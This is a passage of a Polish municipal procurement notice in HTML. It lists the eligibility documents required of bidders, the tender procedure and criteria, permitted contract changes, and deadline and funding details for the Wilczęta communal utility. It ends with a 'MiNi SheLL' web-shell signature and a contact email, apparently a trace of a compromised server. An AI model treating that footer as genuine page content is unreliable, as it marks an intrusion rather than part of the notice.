<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku podmiotów niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaakceptowany wzór umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do oferty, na podstawie której dokonano wyboru Wykonawcy.
Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian w zawartej umowie:
-  w przypadku ustawowej zmiany wysokości podatku VAT
- wystąpienia robót koniecznych do wykonania kompletnej inwestycji, których nie można było     przewidzieć w czasie zawierania niniejszej umowy.
- w przypadku wystąpienia siły wyższej uniemożliwiającej zrealizowanie przedmiotu umowy zgodnie z jej postanowieniami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugwilczeta.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Komunalny w Wilczętach
Wilczęta 84, 14-405 Wilczęta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2014 godzina 12:00, miejsce: Zakład Komunalny w Wilczętach
Wilczęta 84, 14-405 Wilczęta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 - Podstawowe Usługi dla Gospodarki i Ludności Wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com